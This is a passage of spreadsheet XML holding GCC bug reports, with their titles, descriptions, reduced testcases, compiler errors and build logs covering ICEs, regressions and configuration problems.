  ancestors = 0x0
  {
    idt = 0x0
    ioffsets = 0x0
  }
---Type  to continue or q  to quit---
  arrayclass = 0x0
  protectionDomain = 0x0
  assertion_table = 0x0
  hack_signers = 0x0
  chain = 0x0
  aux_info = 0x0
  engine = 0x0
  reflection_data = 0x4060de 
}
why do we have two engine field?</t>
  </si>
  <si>
    <t>GCC-60652</t>
  </si>
  <si>
    <t>System.OS_Constants CRTSCTS</t>
  </si>
  <si>
    <t>The value of CRTSCTS in adainclude/s-oscons.ads is different to the value i have in /usr/include/bits/termios.h on my Linux system.
adainclude/s-oscons.ads
  CRTSCTS : constant := 4294967295 -- Output hw flow control
  Hex: FFFF FFFF
  Dec: 4294967295
  Oct: 37777777777
  Bin: 11111111 11111111 11111111 11111111 (looks more like a mask than a flag)
bits/termios.h
  #define CRTSCTS 020000000000 /* flow control */
  Hex: 8000 0000
  Dec: 2147483648
  Oct: 20000000000
  Bin: 10000000 00000000 00000000 00000000 (ah a bit-flag as expected) 
So I suspect there may be a problem with the autogenerator and octal numbers. I do not know if any other generated constants have similar problems.</t>
  </si>
  <si>
    <t>robert.samuelsson</t>
  </si>
  <si>
    <t>GCC-23329</t>
  </si>
  <si>
    <t>hack in may_propagate_copy should be able to removed</t>
  </si>
  <si>
    <t>The hack in may_propagate_copy:
  /* FIXME.  GIMPLE is allowing pointer assignments and comparisons of
     pointers that have different alias sets.  This means that these
     pointers will have different memory tags associated to them.
     If we allow copy propagation in these cases statements de-referencing
     the new pointer will now have a reference to a different memory tag
     with potentially incorrect SSA information.
     This was showing up in libjava/java/util/zip/ZipFile.java with code
     like:
        struct java.io.BufferedInputStream *T.660
        struct java.io.BufferedInputStream *T.647
        struct java.io.InputStream *is
        struct java.io.InputStream *is.662
        [ ... ]
        T.660 = T.647
        is = T.660     &lt;-- This ought to be type-casted
        is.662 = is
     Also f/name.c exposed a similar problem with a COND_EXPR predicate
     that was causing DOM to generate and equivalence with two pointers of
     alias-incompatible types:
        struct _ffename_space *n
        struct _ffename *ns 
        [ ... ]
        if (n == ns)
          goto lab
        ...
        lab:
        return n
     I think that GIMPLE should emit the appropriate type-casts.  For the
     time being blocking copy-propagation in these cases is the safe thing
     to do.  */
Should be able to removed now as both the DOM and java front-ends issues have been fixed now.
PR 22368 referenced the bugs which were filed so this hack could be removed.  Even though PR 22368 
references more than what is needed to remove this hack I am going to mark this new bug as 
depending on that bug.</t>
  </si>
  <si>
    <t>GCC-41859</t>
  </si>
  <si>
    <t>ICE on invalid expression involving DT with pointer components in I/O</t>
  </si>
  <si>
    <t>The following program is rejected with NAG/ifort/g95 with:
error #6382: The result of an evaluation of an output item list must not be of a derived type that ultimately contains a pointer component.
ERROR: Data transfer element at (1) cannot have POINTER components
ERROR: Derived type T in io-list has POINTER component NODENAME
gfortran crashes in trans-io.c
module inputdom
  type t
    private
    character pointer dimension(:)         :: nodeName =&gt; null()
  end type t
contains
  subroutine getstructinput()
    implicit none
    print * (foo()) ! &lt;------ ICE here!
  end subroutine
  function foo()
    type(t) pointer :: foo
    foo =&gt; null()
  end function foo
end module inputdom
==16927== Invalid read of size 4
==16927==    at 0xD25BE4: __gmpz_sub (aors.h:65)
==16927==    by 0x56C5DE: transfer_array_component (trans-io.c:1947)
==16927==    by 0x56C988: transfer_expr (trans-io.c:2108)
#1  0x000000000056c5df in transfer_array_component (expr= cm=0x149a910 where=)
    at /home/tob/projects/gcc-trunk-checkout/gcc/fortran/trans-io.c:1947
#2  0x000000000056c989 in transfer_expr (se=0x7fffffffd250 ts= addr_expr= code=0x149d5f0)
    at /home/tob/projects/gcc-trunk-checkout/gcc/fortran/trans-io.c:2108
#3  0x000000000057077b in gfc_trans_transfer (code=0x149d5f0) at /home/tob/projects/gcc-trunk-checkout/gcc/fortran/trans-io.c:2244
#4  0x000000000053be88 in gfc_trans_code (code=0x149d5f0) at /home/tob/projects/gcc-trunk-checkout/gcc/fortran/trans.c:1250
#5  0x000000000056e7a8 in build_dt (function= code=)
    at /home/tob/projects/gcc-trunk-checkout/gcc/fortran/trans-io.c:1814</t>
  </si>
  <si>
    <t>GCC-41229</t>
  </si>
  <si>
    <t>[4.5 Regression] VTA: internal compiler error: verify_ssa failed</t>
  </si>
  <si>
    <t>current trunk:
&gt; gfortran -cpp -c -fvar-tracking-assignments -O2 bug.f90
bug.f90: In function â€˜cp_fm_triangular_multiplyâ€™:
bug.f90:1:0: error: expected an SSA_NAME object
bug.f90:1:0: error: in statement
# DEBUG istat =&gt; stat.0
bug.f90:1:0: internal compiler error: verify_ssa failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
&gt; cat bug.f90
SUBROUTINE cp_fm_triangular_multiply()
    INTEGER PARAMETER :: dp=KIND(0.0D0)
    REAL(dp) ALLOCATABLE DIMENSION(:)      :: tau work
    REAL(KIND=dp) DIMENSION(: :) POINTER  :: a
    ndim = SIZE(a2)
    ALLOCATE(tau(ndim)STAT=istat)
    ALLOCATE(work(2*ndim)STAT=istat)
END SUBROUTINE</t>
  </si>
  <si>
    <t>GCC-71952</t>
  </si>
  <si>
    <t>[Coarray F2008] Rejects valid coarray access with array partref</t>
  </si>
  <si>
    <t>I'm filing this just to keep track of a missing coarray feature and to mention a minor typographical error.  I search on partref turns up nothing in the draft Fortran 2015 standard.  After searching of the web I realized it was intended to be part-ref. A bit more explanation might be helpful if appropriate. 
$ cat coarray-access-with-array-partref.f90 
  implicit none
  type particles
    real x(1)
  end type
  type(particles) outbox(1)[*]foo
  print *outbox(1)[1]%x
end 
$ gfortran -fcoarray=lib coarray-access-with-array-partref.f90 
coarray-access-with-array-partref.f90:6:10:
   print *outbox(1)[1]%x
          1
Error: Sorry coindexed access at (1) to a scalar component with an array partref is not yet supported</t>
  </si>
  <si>
    <t>GCC-23630</t>
  </si>
  <si>
    <t>[4.0 Regression] built-ins MMX regression</t>
  </si>
  <si>
    <t>I am using MMX built-ins and gcc-4.0-20050825 and I am experiencing generation
of a lot of uneeded movq. I don't know which gcc snapshot introduced this but a
I know that some pre-release gcc 4.0 didn't show this bad behaviour.
BTW this is using gcc built-ins. The situation is much wors when using
intrinsics via mmintrin.h. (Again old pre4.0 gcc didn't have the problem
using gcc builtins or mmintin.h intrinsics made no difference both generated
nice code.)
LC_ALL=C i686-pc-linux-gnu-gcc-4.0.2-beta20050825 -v
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with:
/var/tmp/portage/gcc-4.0.2_beta20050825/work/gcc-4.0-20050825/configure
--prefix=/usr --bindir=/usr/i686-pc-linux-gnu/gcc-bin/4.0.2-beta20050825
--includedir=/usr/lib/gcc/i686-pc-linux-gnu/4.0.2-beta20050825/include
--datadir=/usr/share/gcc-data/i686-pc-linux-gnu/4.0.2-beta20050825
--mandir=/usr/share/gcc-data/i686-pc-linux-gnu/4.0.2-beta20050825/man
--infodir=/usr/share/gcc-data/i686-pc-linux-gnu/4.0.2-beta20050825/info
--with-gxx-include-dir=/usr/lib/gcc/i686-pc-linux-gnu/4.0.2-beta20050825/include/g++-v4
--host=i686-pc-linux-gnu --build=i686-pc-linux-gnu --disable-altivec
--enable-nls --without-included-gettext --with-system-zlib --disable-checking
--disable-werror --disable-libunwind-exceptions --disable-multilib
--disable-libgcj --enable-languages=cc++ --enable-shared --enable-threads=posix
--enable-__cxa_atexit --enable-clocale=gnu
Thread model: posix
gcc version 4.0.2-beta20050825 (Gentoo 4.0.2_beta20050825)
i686-pc-linux-gnu-gcc-4.0.2-beta20050825 mixaudio16.c -save-temps -c -O2
-march=athlon-xp
Source:
typedef int v2si __attribute__ ((vector_size (8)))
typedef int di __attribute__ ((vector_size (8)))
typedef short v4hi __attribute__ ((vector_size (8)))
void MixAudio16_MMX_T(char* src1 char* src2 char* dst)
{
	v4hi indata
	v4hi signmask
	v2si loout
	v2si hiout
	v2si temp
	__attribute__((aligned(16))) static const short sm[4] =
{0x80000x80000x80000x8000}
	static const v4hi *m = (v4hi*)sm
	indata   = *(v4hi*)src1
	signmask = (v4hi)__builtin_ia32_pand((di)indata *(di*)m)
	signmask = __builtin_ia32_pcmpeqw(signmask *m)
	loout = (v2si)__builtin_ia32_punpcklwd(indata signmask)
	hiout = (v2si)__builtin_ia32_punpckhwd(indata signmask)
	indata   = *(v4hi*)src2
	signmask = (v4hi)__builtin_ia32_pand((di)indata *(di*)m)
	signmask = __builtin_ia32_pcmpeqw(signmask *m)
	temp  = (v2si)__builtin_ia32_punpcklwd(indata signmask)
	loout = __builtin_ia32_paddd(loout temp)
	temp  = (v2si)__builtin_ia32_punpckhwd(indata signmask)
	hiout = __builtin_ia32_paddd(hiout temp)
	*(v4hi*)dst = __builtin_ia32_packssdw(loout hiout)
	__builtin_ia32_emms()
	return
}
assembler:
00002e50 :
    2e50:       55                      push   %ebp
    2e51:       89 e5                   mov    %esp%ebp
    2e53:       83 ec 10                sub    $0x10%esp
    2e56:       8b 15 04 00 00 00       mov    0x4%edx
    2e5c:       8b 45 08                mov    0x8(%ebp)%eax
    2e5f:       0f 6f 10                movq   (%eax)%mm2
    2e62:       0f 6f ca                movq   %mm2%mm1
    2e65:       8b 45 0c                mov    0xc(%ebp)%eax
    2e68:       0f 7f 55 f8             movq   %mm20xfffffff8(%ebp)
    2e6c:       0f 6f 45 f8             movq   0xfffffff8(%ebp)%mm0
    2e70:       0f db 02                pand   (%edx)%mm0
    2e73:       0f 7f 45 f0             movq   %mm00xfffffff0(%ebp)
    2e77:       0f 6f 45 f0             movq   0xfffffff0(%ebp)%mm0
    2e7b:       0f 75 02                pcmpeqw (%edx)%mm0
    2e7e:       0f 61 c8                punpcklwd %mm0%mm1
    2e81:       0f 69 d0                punpckhwd %mm0%mm2
    2e84:       0f 7f 4d f8             movq   %mm10xfffffff8(%ebp)
    2e88:       0f 6f 5d f8             movq   0xfffffff8(%ebp)%mm3
    2e8c:       0f 7f 55 f8             movq   %mm20xfffffff8(%ebp)
    2e90:       0f 6f 10                movq   (%eax)%mm2
    2e93:       0f 6f 65 f8             movq   0xfffffff8(%ebp)%mm4
    2e97:       0f 7f 55 f8             movq   %mm20xfffffff8(%ebp)
    2e9b:       0f 6f 45 f8             movq   0xfffffff8(%ebp)%mm0
    2e9f:       0f 6f ca                movq   %mm2%mm1
    2ea2:       0f db 02                pand   (%edx)%mm0
    2ea5:       8b 45 10                mov    0x10(%ebp)%eax
    2ea8:       0f 7f 45 f0             movq   %mm00xfffffff0(%ebp)
    2eac:       0f 6f 45 f0             movq   0xfffffff0(%ebp)%mm0
    2eb0:       0f 75 02                pcmpeqw (%edx)%mm0
    2eb3:       0f 61 c8                punpcklwd %mm0%mm1
    2eb6:       0f 69 d0                punpckhwd %mm0%mm2
    2eb9:       0f 7f 4d f8             movq   %mm10xfffffff8(%ebp)
    2ebd:       0f fe 5d f8             paddd  0xfffffff8(%ebp)%mm3
    2ec1:       0f 7f 55 f8             movq   %mm20xfffffff8(%ebp)
    2ec5:       0f fe 65 f8             paddd  0xfffffff8(%ebp)%mm4
    2ec9:       0f 6b dc                packssdw %mm4%mm3
    2ecc:       0f 7f 18                movq   %mm3(%eax)
    2ecf:       0f 77                   emms
    2ed1:       c9                      leave
    2ed2:       c3                      ret
    2ed3:       8d b6 00 00 00 00       lea    0x0(%esi)%esi
    2ed9:       8d bc 27 00 00 00 00    lea    0x0(%edi)%edi</t>
  </si>
  <si>
    <t>GCC-46535</t>
  </si>
  <si>
    <t>[4.6 Regression] Endless loop during inlining</t>
  </si>
  <si>
    <t>Reducing PR46523 I run into
&gt; gdb --args ./cc1plus -quiet -O2 -m32 -w -std=c++0x -o /dev/null 9793.ii
...
Program received signal SIGINT Interrupt.
0x0000000000f9a39c in cgraph_decide_inlining_of_small_functions ()
    at /space/rguenther/src/svn/trunk/gcc/ipa-inline.c:1178
1178                  where = where-&gt;callers-&gt;caller
(gdb) l
1173              where = edge-&gt;caller
1174              while (where-&gt;global.inlined_to)
1175                {
1176                  if (where-&gt;decl == edge-&gt;callee-&gt;decl)
1177                    break
1178                  where = where-&gt;callers-&gt;caller
1179                }
1180              if (where-&gt;global.inlined_to)
1181                {
1182                  edge-&gt;inline_failed
(gdb) p where-&gt;callers-&gt;caller
$1 = (struct cgraph_node *) 0x7ffff4f99420
(gdb) p where
$2 = (struct cgraph_node *) 0x7ffff4f99420
(gdb) p where-&gt;global.inlined_to
$3 = (struct cgraph_node *) 0x7ffff4fb3420
thus an endless loop.  Maybe related to the original PR of course.
I will try to reduce this one as well as soon as reducing the other
one finished.</t>
  </si>
  <si>
    <t>GCC-24841</t>
  </si>
  <si>
    <t>dg-require compilation-test trigged on test with additional-sources barfs</t>
  </si>
  <si>
    <t>With Sun Nov 13 12:09:09 UTC 2005 (revision 106861M)
(likely not important a
make check-gcc 'RUNTESTFLAGS=dg.exp=attr-weakref-1.c'
shows this:
Running /home/hp/combined/combined/gcc/testsuite/gcc.dg/dg.exp ...
FAIL: gcc.dg/attr-weakref-1.c (test for excess errors)
WARNING: gcc.dg/attr-weakref-1.c compilation failed to produce executable
with this in gcc.log:
Executing on host: /home/hp/combined/native-regobj/gcc/xgcc -B/home/hp/combined/native-regobj/gcc/  -fno-show-column  ./attr-weak\
ref-1a.c -c  -o objfmtst.o objfmtst.c    (timeout = 300)
xgcc: ./attr-weakref-1a.c: No such file or directory^M
compiler exited with status 1
output is:
xgcc: ./attr-weakref-1a.c: No such file or directory^M
Executing on host: /home/hp/combined/native-regobj/gcc/xgcc -B/home/hp/combined/native-regobj/gcc/ /home/hp/combined/combined/gcc\
/testsuite/gcc.dg/attr-weakref-1.c   -O2 -fno-show-column  -lm   -o ./attr-weakref-1.exe    (timeout = 300)
/tmp/ccUlVxb5.o: In function `fv7':attr-weakref-1.c:(.text+0x1): undefined reference to `uv7'^M
(more linker errors)
collect2: ld returned 1 exit status^M
FAIL: gcc.dg/attr-weakref-1.c (test for excess errors)
You don't see this if the { dg-require-weak  } is cached by an earlier test
(no earlier such test even with dg.exp alone with a whole run it seems the
cached one is from gcc.c-torture/compile/20011119-1.c).</t>
  </si>
  <si>
    <t>GCC-8527</t>
  </si>
  <si>
    <t>gcc 3.2 compilation on solaris 2.7</t>
  </si>
  <si>
    <t>Trying to compile gcc 3.2 on 2.7 and getting following errors:
1) configure --prefix=/usr/local/pkg/gcc/3.2
2) make
gcc -c -DIN_GCC    -g -O2 -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes   -DHAVE_CONFIG_H    -I. -If -I. -I./f -I./config -I./../include f/where.c -o f/where.o
rm -f f771
gcc -DIN_GCC    -g -O2 -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wtraditional -pedantic -Wno-long-long  -DHAVE_CONFIG_H  -o f771 f/bad.o f/bit.o f/bld.o f/com.o f/data.o f/equiv.o f/expr.o f/global.o f/implic.o f/info.o f/intrin.o f/lab.o f/lex.o f/malloc.o f/name.o f/parse.o f/src.o f/st.o f/sta.o f/stb.o f/stc.o f/std.o f/ste.o f/storag.o f/stp.o f/str.o f/sts.o f/stt.o f/stu.o f/stv.o f/stw.o f/symbol.o f/target.o f/top.o f/type.o f/version.o f/where.o main.o libbackend.a ./intl/libintl.a   ../libiberty/libiberty.a
gcc -c -DIN_GCC    -g -O2 -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes   -DHAVE_CONFIG_H    -I. -Ijava -I. -I./java -I./config -I./../include java/parse.c -o java/parse.o
/home/mitchell/gcc-3.2/gcc-3.2/gcc/java/parse.y:49: config.h: Permission denied
/home/mitchell/gcc-3.2/gcc-3.2/gcc/java/parse.y:50: system.h: Permission denied
/home/mitchell/gcc-3.2/gcc-3.2/gcc/java/parse.y:52: tree.h: Permission denied
/home/mitchell/gcc-3.2/gcc-3.2/gcc/java/parse.y:53: rtl.h: Permission denied
/home/mitchell/gcc-3.2/gcc-3.2/gcc/java/parse.y:54: obstack.h: Permission denied
/home/mitchell/gcc-3.2/gcc-3.2/gcc/java/parse.y:55: toplev.h: Permission denied
/home/mitchell/gcc-3.2/gcc-3.2/gcc/java/parse.y:56: flags.h: Permission denied
/home/mitchell/gcc-3.2/gcc-3.2/gcc/java/parse.y:57: java-tree.h: Permission denied
/home/mitchell/gcc-3.2/gcc-3.2/gcc/java/parse.y:58: jcf.h: Permission denied
/home/mitchell/gcc-3.2/gcc-3.2/gcc/java/parse.y:59: lex.h: Permission denied
/home/mitchell/gcc-3.2/gcc-3.2/gcc/java/parse.y:60: parse.h: Permission denied
/home/mitchell/gcc-3.2/gcc-3.2/gcc/java/parse.y:61: zipfile.h: Permission denied
/home/mitchell/gcc-3.2/gcc-3.2/gcc/java/parse.y:62: convert.h: Permission denied
/home/mitchell/gcc-3.2/gcc-3.2/gcc/java/parse.y:63: buffer.h: Permission denied
/home/mitchell/gcc-3.2/gcc-3.2/gcc/java/parse.y:64: xref.h: Permission denied
/home/mitchell/gcc-3.2/gcc-3.2/gcc/java/parse.y:65: function.h: Permission denied
/home/mitchell/gcc-3.2/gcc-3.2/gcc/java/parse.y:66: except.h: Permission denied
/home/mitchell/gcc-3.2/gcc-3.2/gcc/java/parse.y:67: ggc.h: Permission denied
/home/mitchell/gcc-3.2/gcc-3.2/gcc/java/parse.y:457: lex.c: Permission denied
make[1]: *** [java/parse.o] Error 1
make[1]: Leaving directory `/home/sysadm/usrlocal/src/gcc-3.2/gcc'
make: *** [all-gcc] Error 2
Release:
gcc-3.2
Environment:
gcc version: 3.2
OS : solaris 2.7</t>
  </si>
  <si>
    <t>asthana</t>
  </si>
  <si>
    <t>GCC-31944</t>
  </si>
  <si>
    <t>[4.1/4.2/4.3 Regression] Endless loop while building a 64-bit 2.6.20 kernel</t>
  </si>
  <si>
    <t>The file fs/ocfs2/dlm/dlmmaster.c from the 2.6.20 kernel triggers an endless loop in gcc 4.1 built for the hppa64-linux-gnu target.
It occurs at -O2 but not at -O1 or -O0. Also specifying -fno-cse-follow-jumps workaround the problem.
Thanks to Randolph Chung we have a reduced testcase:
struct bug { int type }
static void stuck(struct bug *mle void *res)
{
 if (mle-&gt;type == 1) {
  if (res == 0) asm volatile(nop)
 } 
 else if (mle-&gt;type == 0) {
  if (res == 0) {
    asm volatile(nop : : i (0)) 
  }
 }
}
void foo(void) { stuck(0 0) }
void bar(void) { stuck(0 0) }
And some infos about the compiler used:
Using built-in specs.
Target: hppa64-linux-gnu
Configured with: ../src/configure --enable-languages=c --prefix=/usr --libexecdir=/usr/lib --disable-shared --disable-nls --disable-threads --disable-libffi --disable-libgomp --disable-libmudflap --disable-libssp --with-as=/usr/bin/hppa64-linux-gnu-as --with-ld=/usr/bin/hppa64-linux-gnu-ld --includedir=/usr/hppa64-linux-gnu/include --host=hppa-linux-gnu --build=hppa-linux-gnu --target=hppa64-linux-gnu
Thread model: single
gcc version 4.1.3 20070429 (prerelease) (Debian 4.1.2-6)</t>
  </si>
  <si>
    <t>aurelien</t>
  </si>
  <si>
    <t>GCC-64645</t>
  </si>
  <si>
    <t>liibffi fails to build on cygwin-32</t>
  </si>
  <si>
    <t>I used r219767:
depbase=`echo src/x86/sysv.lo | sed 's|[^/]*$|.deps/s|\.lo$||'`\
/bin/sh ./libtool   --mode=compile /home/ED/gcc-build/./gcc/xgcc -B/home/ED/gcc-build/./gcc/ -B/home/ED/install/i686-pc-cygwin/bin/ -B/home/ED/install/i686-pc-cygwin/lib/ -isystem /home/ED/install/i686-pc-cygwin/include -isystem /home/ED/install/i686-pc-cygwin/sys-include    -DHAVE_CONFIG_H -I. -I../../../gcc-r219767/libffi  -I. -I../../../gcc-r219767/libffi/include -Iinclude -I../../../gcc-r219767/libffi/src  -I. -I../../../gcc-r219767/libffi/include -Iinclude -I../../../gcc-r219767/libffi/src -g -O2 -MT src/x86/sysv.lo -MD -MP -MF $depbase.Tpo -c -o src/x86/sysv.lo ../../../gcc-r219767/libffi/src/x86/sysv.S &amp;&amp;\
mv -f $depbase.Tpo $depbase.Plo
libtool: compile:  /home/ED/gcc-build/./gcc/xgcc -B/home/ED/gcc-build/./gcc/ -B/home/ED/install/i686-pc-cygwin/bin/ -B/home/ED/install/i686-pc-cygwin/lib/ -isystem /home/ED/install/i686-pc-cygwin/include -isystem /home/ED/install/i686-pc-cygwin/sys-include -DHAVE_CONFIG_H -I. -I../../../gcc-r219767/libffi -I. -I../../../gcc-r219767/libffi/include -Iinclude -I../../../gcc-r219767/libffi/src -I. -I../../../gcc-r219767/libffi/include -Iinclude -I../../../gcc-r219767/libffi/src -g -O2 -MT src/x86/sysv.lo -MD -MP -MF src/x86/.deps/sysv.Tpo -c ../../../gcc-r219767/libffi/src/x86/sysv.S  -DDLL_EXPORT -DPIC -o src/x86/.libs/sysv.o
../../../gcc-r219767/libffi/src/x86/sysv.S: Assembler messages:
../../../gcc-r219767/libffi/src/x86/sysv.S:828: Error: junk at end of line first unrecognized character is `'
Makefile:1177: recipe for target 'src/x86/sysv.lo' failed
make[4]: *** [src/x86/sysv.lo] Error 1
make[4]: Leaving directory '/home/ED/gcc-build/i686-pc-cygwin/libffi'
Makefile:1433: recipe for target 'all-recursive' failed
make[3]: *** [all-recursive] Error 1
make[3]: Leaving directory '/home/ED/gcc-build/i686-pc-cygwin/libffi'
Makefile:465: recipe for target 'all' failed
make[2]: *** [all] Error 2
make[2]: Leaving directory '/home/ED/gcc-build/i686-pc-cygwin/libffi'
Makefile:20613: recipe for target 'all-target-libffi' failed
make[1]: *** [all-target-libffi] Error 2
make[1]: Leaving directory '/home/ED/gcc-build'
Makefile:906: recipe for target 'all' failed
make: *** [all] Error 2</t>
  </si>
  <si>
    <t>GCC-7360</t>
  </si>
  <si>
    <t>g++ generates illegal debug info on Solaris that crashes gdb</t>
  </si>
  <si>
    <t xml:space="preserve">        g++ generates debug information that crashes GDB when trying to 
        inspect source files. Analysis by GDB maintainer has shown that
        g++ puts N_FUN markers without matching markers at the beginning
        of a function. See GDB bug report 610 for details.
Release:
3.1 and pre3.1.1 (CVS snapshot 15-Jul-2002)
Environment:
Solaris 2.7 gdb 5.2 and gdb CVS snapshot 17-Jul-2002
System: SunOS IGL.Stanford.EDU 5.7 Generic_106541-16 sun4u sparc SUNWUltra-250
Architecture: sun4
host: sparc-sun-solaris2.7
build: sparc-sun-solaris2.7
target: sparc-sun-solaris2.7
configured with: ./configure --prefix=/usr/local --verbose --x-includes=/usr/openwin/include --x-libraries=/usr/openwin/lib --with-libiconv-path=/usr/local/lib --enable-libgcj --with-gnu-as --with-as=/usr/local/bin/as --with-gnu-ld --with-ld=/usr/local/bin/ld
How-To-Repeat:
        Attached is a tgz archive with four files: test.cxx
        classes.cxx and classes.h contain example source code
        (for minimal classes). The file build will run g++ and
        generate a binary file called test.
        If test is read into gdb up to and including the
        latest snapshot of version 5.2 issuing list D to
        inspect source for class D will crash gdb.
        Note that if inheritance of class D from class C is
        changed to non-virtual gdb does not crash anymore but is
        still unable to show the correct source file.
See attachments for gxxbug.tgz
</t>
  </si>
  <si>
    <t>rohlfing</t>
  </si>
  <si>
    <t>GCC-14760</t>
  </si>
  <si>
    <t>[3.4 regression]A bug in configure{.in} prevents using both --program-suffix and --program-prefix</t>
  </si>
  <si>
    <t>Hello. 
When options like --program-suffix and --program-prefix are passed to configure 
script they are normally converted to a sed program and then discarded so 
when configure is called to subdirs these options are not passed. 
This logic is implemented by the following code from configure.in: 
cat  conftestsed 
s/ --no[[^ ]]* / / 
s/ --c[[a-z-]]*[[= ]][[^ ]]* / / 
s/ --sr[[a-z-]]*[[= ]][[^ ]]* / / 
s/ --ho[[a-z-]]*[[= ]][[^ ]]* / / 
s/ --bu[[a-z-]]*[[= ]][[^ ]]* / / 
s/ --t[[a-z-]]*[[= ]][[^ ]]* / / 
s/ --program-[[pst]][[a-z-]]*[[= ]][[^ ]]* / / 
s/ -cache-file[[= ]][[^ ]]* / / 
s/ -srcdir[[= ]][[^ ]]* / / 
s/ -host[[= ]][[^ ]]* / / 
s/ -build[[= ]][[^ ]]* / / 
s/ -target[[= ]][[^ ]]* / / 
s/ -program-prefix[[= ]][[^ ]]* / / 
s/ -program-suffix[[= ]][[^ ]]* / / 
s/ -program-transform-name[[= ]][[^ ]]* / / 
s/ [[^' -][^ ]*] / / 
s/^ *//s/ *$// 
s\$$$g 
EOF_SED 
sed -f conftestsed  conftestsed.out 
 ${ac_configure_args} 
EOF_SED 
baseargs=`cat conftestsed.out` 
rm -f conftestsed conftestsed.out 
If both --program-prefix and --program-suffix will be given the corresponding 
regilar expression ' --program-[[pst]][[a-z-]]*[[= ]][[^ ]]* ' will catch only 
first of two not touching the second. Since not-discarded option is already 
converted to a sed program lated this will result in either prefix of suffix 
(what happens to be second) added twice to program names. 
This could be fixed trivially - just add 'g' modifier to corresponding line of 
the above sed program: 
--- configure.in.orig   2004-02-06 10:03:08.000000000 +0300 
+++ configure.in        2004-03-10 00:39:05.000000000 +0300 
@@ -17787 +17787 @@ 
 s/ --ho[[a-z-]]*[[= ]][[^ ]]* / / 
 s/ --bu[[a-z-]]*[[= ]][[^ ]]* / / 
 s/ --t[[a-z-]]*[[= ]][[^ ]]* / / 
-s/ --program-[[pst]][[a-z-]]*[[= ]][[^ ]]* / / 
+s/ --program-[[pst]][[a-z-]]*[[= ]][[^ ]]* / /g 
 s/ -cache-file[[= ]][[^ ]]* / / 
 s/ -srcdir[[= ]][[^ ]]* / / 
 s/ -host[[= ]][[^ ]]* / / 
I faced this problem when I worked with Debian gcc-3.4 source package to make 
it build cross-compilers. So I am reporting this against 3.4. However most 
likely the same buglet is also there in other gcc branches.</t>
  </si>
  <si>
    <t>yoush</t>
  </si>
  <si>
    <t>GCC-65263</t>
  </si>
  <si>
    <t>[5 Regression] ICE (error: unrecognizable insn / in insn_min_length at config/rs6000/rs6000.md) on powerpc64le-linux-gnu</t>
  </si>
  <si>
    <t>seen with r221076 on powerpc64le-linux-gnu
$ g++ -c -g -O3 -fPIC eigenvalue.ii 
eigenvalue.ii:26:19: warning: direct base 'VirtualMatrice' inaccessible in 'C' due to ambiguity
 template  class C : H VirtualMatrice {
                   ^
eigenvalue.ii: In member function 'virtual bool C::_ZThn8_NK1CIiE5m_fn1Ei(int) const':
eigenvalue.ii:47:1: error: unrecognizable insn:
 }
 ^
(call_insn/j 3 2 4 (parallel [
            (call (mem:SI (symbol_ref/i:DI (_ZNK14VirtualMatriceIiE5m_fn1Ei) [flags 0x1] ) [0  S4 A8])
                (const_int 0 [0]))
            (use (const_int 0 [0]))
            (use (reg:SI 65 lr))
            (simple_return)
        ]) eigenvalue.ii:27 -1
     (nil)
    (nil))
eigenvalue.ii:47:1: internal compiler error: in insn_min_length at config/rs6000/rs6000.md:7813
Please submit a full bug report
with preprocessed source if appropriate.
$cat eigenvalue.ii
template  class A
template  struct VirtualMatrice {
  virtual bool m_fn1(int) const { return true }
  struct B {
    A x
    B(VirtualMatrice *p1 A p2) : x(p2) { p1-&gt;m_fn1(0) ?: throw }
  }
  void operator*(A p1) { B(this p1) }
  ~VirtualMatrice()
}
template  class A {
public:
  operator int *()
  A(int * long)
}
class G : public A {
public:
  G(long)
}
int typedef Complex
template  class H : VirtualMatrice {}
template  class C
template  class C : H VirtualMatrice {
  bool m_fn1(int) const { return true }
}
template 
void DoIdoAction(int int A p3 A A A Mat Mat &amp;p8) {
  p8 *p3
}
class D {
  typedef int K
  class F {
    int operator()() const
  }
}
int D::F::operator()() const {
  VirtualMatrice *a
  VirtualMatrice b 
  G c(0) g(1)
  int d e f
  A h(
  DoIdoAction(0 3 h i j c b B)
}</t>
  </si>
  <si>
    <t>GCC-44043</t>
  </si>
  <si>
    <t>[4.6 Regression] sorry unimplemented: inlining failed in call to 'dst_output': optimizing for size and code size would grow</t>
  </si>
  <si>
    <t>building the kernel hits this error:
include/linux/netfilter.h: In function 'raw_sendmsg':
include/net/dst.h:262:19: sorry unimplemented: inlining failed in call to 'dst_output': optimizing for size and code size would grow
include/linux/netfilter.h:206:7: sorry unimplemented: called from here
make[2]: *** [net/ipv4/raw.o] Error 1
make[1]: *** [net/ipv4] Error 2
make: *** [net] Error 2
 gcc --version
gcc (GCC) 4.6.0 20100416 (experimental)
Copyright (C) 2010 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.</t>
  </si>
  <si>
    <t>justinmattock</t>
  </si>
  <si>
    <t>GCC-33010</t>
  </si>
  <si>
    <t>bootstrap fails with assembler error</t>
  </si>
  <si>
    <t>bootstrap for me worked fine on August 6th.  Today (August 7th) it fails with:
gmake[6]: Entering directory `/u01/var/tmp/gcc_trunk_svn/gcc_20070807/gcc'
